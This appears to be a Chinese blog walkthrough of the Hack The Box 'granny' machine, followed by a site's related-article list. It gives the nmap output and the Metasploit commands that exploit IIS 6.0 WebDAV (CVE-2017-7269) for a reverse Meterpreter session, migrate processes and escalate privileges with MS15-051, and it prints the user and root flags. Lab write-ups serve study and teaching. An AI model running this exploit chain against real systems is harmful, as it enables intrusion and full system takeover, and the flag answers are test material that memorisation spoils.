当前位置: 首页 > news >正文

[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升

news 来源:原创 2024/9/19 23:34:59

信息收集

IP AddressOpening Ports
10.10.10.15TCP:80

$ nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Server Date: Thu, 22 Aug 2024 07:28:25 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

IIS 6.0 & CVE-2017-7269 & BOF

$ msfconsole

msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.16.24

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

image.png

meterpreter > bg

权限提升 & MS15-051

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1

msf6 post(multi/recon/local_exploit_suggester) > run

image-1.png

但是你如果尝试执行权限提升会出现错误

image-2.png

为了确保稳定,进程迁移到davcdata.exe

image-3.png

meterpreter > migrate 2732

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image

msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.16.24

msf6 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1

msf6 exploit(windows/local/ms15_051_client_copy_image) > run

image-4.png

User.txt

700c5dc163014e22b3e408f8703f67d1

Root.txt

aa4beed1c0584445ab463a6747bd06e9

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • mov转mp4,这几款软件轻松转换格式!
  • OD C卷 - 幼儿园篮球游戏
  • 实现Kruskal算法连通游戏地图地牢
  • RTA-VRTE适配Orin
  • pdf查看密码
  • Android 14适配
  • Swift 6.0 如何更优雅的抛出和处理特定类型的错误
  • 每日一问:为什么MySQL索引使用B+树? 第4版 (含时间复杂度对比表格)
  • JVM感知docker容器内存资源限制
  • Blender----利用DEM(tif)生成三维模型
  • 解读红外控制遥控器原理!!!
  • Pytest框架直接右键运行 testcase.py,不执行最外层conftest
  • CACTER直播预告:聚焦EDLP邮件数据防泄露实战重点
  • 基于STM32+手机APP设计的智能停车场系统——程序源码原理图设计原理设计文档演示视频框图等(文末工程资料下载)
  • 数据仓库: 4- 数据质量管理 5- 元数据管理
  • .pyc 想到的一些问题
  • JavaScript工作原理(五):深入了解WebSockets,HTTP/2和SSE,以及如何选择
  • MySQL数据库运维之数据恢复
  • PAT A1017 优先队列
  • Redis 懒删除(lazy free)简史
  • Redis学习笔记 - pipline(流水线、管道)
  • 为视图添加丝滑的水波纹
  • 线性表及其算法(java实现)
  • 用 Swift 编写面向协议的视图
  • 自定义函数
  • python最赚钱的4个方向,你最心动的是哪个?
  • 通过调用文摘列表API获取文摘
  • #FPGA(基础知识)
  • #Linux(权限管理)
  • #pragma once与条件编译
  • (2024,LoRA,全量微调,低秩,强正则化,缓解遗忘,多样性)LoRA 学习更少,遗忘更少
  • (42)STM32——LCD显示屏实验笔记
  • (Matalb回归预测)PSO-BP粒子群算法优化BP神经网络的多维回归预测
  • (计算机网络)物理层
  • (论文阅读26/100)Weakly-supervised learning with convolutional neural networks
  • (每日一问)操作系统:常见的 Linux 指令详解
  • (转)一些感悟
  • ..thread“main“ com.fasterxml.jackson.databind.JsonMappingException: Jackson version is too old 2.3.1
  • .bashrc在哪里,alias妙用
  • .Net Core与存储过程(一)
  • .Net 执行Linux下多行shell命令方法
  • .NET开发不可不知、不可不用的辅助类(一)
  • .Net中ListT 泛型转成DataTable、DataSet
  • @ModelAttribute 注解
  • @SuppressWarnings(unchecked)代码的作用
  • [ C++ ] STL_list 使用及其模拟实现
  • [2015][note]基于薄向列液晶层的可调谐THz fishnet超材料快速开关——
  • [2016.7 day.5] T2
  • [acm算法学习] 后缀数组SA
  • [Android]通过PhoneLookup读取所有电话号码
  • [BUUCTF]-PWN:[极客大挑战 2019]Not Bad解析
  • [C++] 如何使用Visual Studio 2022 + QT6创建桌面应用
  • [C++]运行时,如何确保一个对象是只读的
  • [C++基础]-入门知识
  • [codevs 1515]跳 【解题报告】